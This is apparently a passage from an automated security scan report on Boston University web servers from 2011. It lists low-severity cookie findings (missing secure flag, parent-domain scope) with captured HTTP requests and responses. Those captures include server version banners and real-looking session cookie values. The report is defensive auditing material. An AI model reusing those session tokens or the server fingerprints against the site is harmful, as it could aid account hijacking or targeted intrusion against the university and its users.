Last-Modified: Wed, 02 Mar 2011 16:29:08 GMT
ETag: "1420040800001234-1b28-49d82697dbd01"
Accept-Ranges: bytes
Content-Length: 6952
X-BU-Main-Uniqueid: ToyiUArxHDYAAGUNvhkAAAMS
X-BU-Duration: D=12629
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-eq
...[SNIP]...

5.32. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin?session=a48b5fc44e9c3778dbfa93d21a2f878d:cussp-srv3&AuthServCd=it_kerb&LoginPromptInd=ON&SidPromptInd=&reason=Initial%2520request%2520for%2520authentication&app=Alumni%2520Directory%2520Harris&contact=%253Ca%2520href%253D%2522mailto%253Aacct-mgr%2540bu.edu%2522%253EAccount%2520Manager%253C%252Fa%253E&ext=alum&OptimisticLoginInd=ON&LoginPromptTime=1317837692&SidCheckPromptTime= HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.19.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3

Response

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:01:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Location: https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.8971
Content-Length: 293
Content-Type: text/html; charset=iso-8859-1
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybfQrxHDYAAEnch14AAAKc
X-BU-Duration: D=288046
X-BU-Backend: builtin (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://weblogin.bu.edu/web@login3/1317837693/5
...[SNIP]...

5.33. https://www.bu.edu/link/bin/uiscgi_studentlink  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_studentlink

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link/bin/uiscgi_studentlink HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 17:47:35 GMT
Server: Apache/2.2.0 (BU-Version1)
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyYNwrxHD4AAFEANUgAAAKM
X-BU-Duration: D=361723
X-BU-Backend: builtin (null)
Connection: close

<!-- ----------------------------------------------------------------
This was generated for
at Wed Oct 5 13:47:36 2011
...[SNIP]...

5.34. https://www.bu.edu/phpbin/search/cms.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /phpbin/search/cms.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /phpbin/search/cms.php HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Wed, 05 Oct 2011 18:30:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d PHP/4.4.9
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/4.4.9
Location: http://www.bu.edu/phpbin/search/?q=&client=default_frontend&output=xml_no_dtd&proxystylesheet=default_frontend&t=index
Content-Length: 0
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiYwrxHDYAAGV6ygAAAARG
X-BU-Duration: D=34973
X-BU-Backend: http://webapps-881.bu.edu:180 (null)
Connection: close


5.35. https://www.bu.edu/phpbin/telegraph/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /phpbin/telegraph/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /phpbin/telegraph/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: https://www.bu.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bu.edu/alumni-forms/forms/giving/online/index/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

form_location=%2Falumni-forms%2Fforms%2Fgiving%2Fonline%2Findex%2F&form_filename=index.html&form_configuration=donate.xml&first_name=&last_name=&address=&city=&state=n%2Fa&country=United+States&zip=&p
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:01:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d PHP/4.4.9
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybcgrxHDYAAEnbg64AAAQM
X-BU-Duration: D=1007362
X-BU-Backend: http://webapps-881.bu.edu:180 (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 59702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

5.36. https://www.bu.edu/tech/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/about/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/about/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:24 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:20:00 GMT
Accept-Ranges: bytes
Content-Length: 67007
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:24 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQArxHDYAAGUNvSUAAAMM
X-BU-Duration: D=8774
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

5.37. https://www.bu.edu/tech/accounts/wireless/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/accounts/wireless/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/accounts/wireless/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://netreg.bu.edu/faq.cgi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:37 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 17:59:36 GMT
Accept-Ranges: bytes
Content-Length: 69132
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:04:37 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybCQrxHDYAAEY9TssAAAIA
X-BU-Duration: D=9325
X-BU-Backend: niscms http://wwwcms02.bu.edu
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

5.38. https://www.bu.edu/tech/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/contact/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/contact/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:23 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPwrxHDYAAGJWsScAAAFN
X-BU-Duration: D=366081
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

5.39. https://www.bu.edu/tech/feed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/feed/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/feed/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:28 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 18:17:42 GMT
ETag: "999deaaf7fef0449c165077299c01d7a"
Content-Type: text/xml; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiRArxHDYAAGUMuo8AAAKJ
X-BU-Duration: D=224232
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

5.40. https://www.bu.edu/tech/policies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/policies/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/policies/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:27 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:19:59 GMT
Accept-Ranges: bytes
Content-Length: 68846
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:27 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQwrxHDYAAGUNvWMAAAMB
X-BU-Duration: D=8720
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

5.41. https://www.bu.edu/tech/projects/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/projects/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/projects/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:26 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:20:00 GMT
Accept-Ranges: bytes
Content-Length: 66854
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:26 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQgrxHDYAAGJVrYoAAAHY
X-BU-Duration: D=10295
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

5.42. https://www.bu.edu/tech/service/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/service/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/service/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:25 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:24 GMT
Accept-Ranges: bytes
Content-Length: 67216
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:25 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiQQrxHDYAAGUMumgAAAKZ
X-BU-Duration: D=11105
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

5.43. https://www.bu.edu/tech/services/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/alumni/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/alumni/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:22 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/5.1.6
X-CMS-Backend: wwwcms01.bu.edu
Vary: Cookie
X-Pingback: http://www.bu.edu/tech/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPgrxHDYAAGUMulEAAAKP
X-BU-Duration: D=386473
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

5.44. https://www.bu.edu/tech/services/departments/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/departments/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/departments/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:21 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:20 GMT
Accept-Ranges: bytes
Content-Length: 108281
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:21 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiPQrxHDYAAGJWsQ4AAAFU
X-BU-Duration: D=10019
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

5.45. https://www.bu.edu/tech/services/faculty/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/faculty/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/faculty/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:16 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:28:52 GMT
Accept-Ranges: bytes
Content-Length: 105352
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:16 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOArxHDYAAGJWsOoAAAFG
X-BU-Duration: D=8712
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

5.46. https://www.bu.edu/tech/services/researchers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/researchers/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/researchers/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:18 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:17 GMT
Accept-Ranges: bytes
Content-Length: 98337
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:18 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOgrxHDYAAGJWsPgAAAFY
X-BU-Duration: D=9158
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

5.47. https://www.bu.edu/tech/services/staff/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/staff/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/staff/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:19 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:30:18 GMT
Accept-Ranges: bytes
Content-Length: 104691
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:19 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOwrxHDYAAGJVrSYAAAHG
X-BU-Duration: D=23961
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

5.48. https://www.bu.edu/tech/services/students/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /tech/services/students/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/services/students/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:16 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:28:45 GMT
Accept-Ranges: bytes
Content-Length: 92477
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:35:16 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiOArxHDYAAGUNvMsAAAMY
X-BU-Duration: D=10392
X-BU-Backend: niscms http://wwwcms01.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

6. Cookie scoped to parent domain  previous  next
There are 48 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


6.1. https://weblogin.bu.edu//web@login3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   //web@login3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET //web@login3?jsv=1.5p&br=un&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
